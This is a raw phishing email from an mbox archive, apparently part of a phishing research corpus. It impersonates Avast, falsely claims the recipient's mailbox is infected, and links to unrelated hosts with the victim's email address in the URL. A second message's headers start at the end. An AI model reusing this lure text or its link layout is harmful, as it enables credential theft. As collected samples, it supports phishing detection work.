From: Avast AntiVirus <ops.kpa@intralineshipping.com>
Date: Tue, 23 Aug 2016 20:57:51 +0100
Message-Id: <20160823195754.AF0A51FB9562@zimbra147.megavelocity.net>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 343

You will not see this in a MIME-aware mail reader.
--===============0713522428==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


   	 WARNING!!! =


Dear jose@monkey.org  Your mailbox has been been infected with a deadly vir=
us. =

This can cause total email shutdown or data loss. =


To stay secured, you must run an email scan now, =

else your mailbox will crash soon. =


 =

    Scan Mailbox Now =




 =

 =

 =

    	 	 Safe Mail: This email has been checked for viruses by Avast antivir=
us software. =

http://jmagalhaes.com/cache/mod/Avast/Coded/index.php?email=3Djose@monkey.o=
rg">www.avast.com=20
--===============0713522428==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE>
<TBODY>
<TR>
<TD width=3D20></TD>
<TD><FONT size=3D2 face=3Dverdana><B>WARNING!!!</B> <BR><BR>Dear jose@monke=
y.org </FONT>
<P><FONT size=3D2 face=3Dverdana>Your mailbox has been been infected with a=
 deadly virus. <BR>This can cause total email shutdown or data loss. <BR><B=
R>To stay secured, you must run an email scan now, <BR>else your mailbox wi=
ll crash soon. <BR><BR>
<TABLE style=3D"BACKGROUND: #084b8a; border-radius: 5px; -moz-border-radius=
: 5px; -webkit-border-radius: 5px" height=3D45 width=3D300>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none" href=3D"http://steel=
framefabricators.co.ke/css/avt/avast/index.php?email=3Djose@monkey.org"><FO=
NT color=3D#ffffff size=3D4 face=3Dcalibri>Scan Mailbox Now </FONT></A></DI=
V></TD></TR></TBODY></TABLE></FONT><BR><BR></P>
<HR align=3Dleft width=3D700>
<BR>
<TABLE>
<TBODY>
<TR>
<TD><IMG src=3D"http://www.complaintsboard.com/thumb.php?src=3Davast.png&am=
p;wmax=3D900&amp;hmax=3D900&amp;quality=3D90&amp;nocrop=3D1&amp;bname=3D109=
366" width=3D100 height=3D45> </TD>
<TD width=3D10></TD>
<TD><FONT size=3D2 face=3Dcalibri><B><FONT color=3D#ff0000>Safe Mail:</FONT=
> This email has been checked for viruses by Avast antivirus software. </B>=
<BR>http://jmagalhaes.com/cache/mod/Avast/Coded/index.php?email=3Djose@monk=
ey.org"&gt;<FONT color=3Dblue size=3D2 face=3Dcalibri><B>www.avast.com</B><=
/FONT> </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></=
HTML>
--===============0713522428==--

From jose@monkey.org Wed Aug 24 02:32:44 2016 +0000
Return-Path: faktor@faktor.de
Delivered-To: jose@monkey.org
X-FDA: 71882212248.07.joke27_8c43b2dcc3f10
X-Spam-Summary: 10,1,0,3cc08d50946bc598,d41d8cd98f00b204,faktor@faktor.de,:,RULES_HIT:41:46:72:146:355:375:379:541:543:882:960:962:967:973:983:988:989:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1437:1515:1516:1517:1534:1543:1548:1550:1567:1570:1588:1589:1593:1594:1711:1712:1714:1730:1747:1777:1792:2282:2393:2525:2527:2561:2565:2682:2685:2828:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3167:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4384:5007:6114:6117:6261:6642:6671:6688:8603:8957:9025:9388:9868:9908:10004:10049:10346:11473:11656:11658:11914:11984:12043:12114:12160:12438:12555:12698:12737:12956:12958:12961:13007:13139:13439:13894:14181:14241:14721:21080:21325:21433:30054:30070,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:24,LUA_SUMMARY:none
X-HE-Tag: joke27_8c43b2dcc3f10
X-Filterd-Recvd-Size: 3878
Received: from faktor.de (faktor.de [213.160.76.239])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 24 Aug 2016 02:32:43 +0000 (UTC)
Received: by faktor.de (Postfix, from userid 10000)
	id 6222C1236EF; Wed, 24 Aug 2016 04:04:29 +0200 (CEST)
To: jose@monkey.org
Subject: =?iso-8859-1?Q?__=DCberpr=FCfen_Sie_Ihre_pers=F6nlichen_Daten?=
X-PHP-Originating-Script: 10000:aaaaaaaaaaaaaa.php
Date: Wed, 24 Aug 2016 04:04:29 +0200
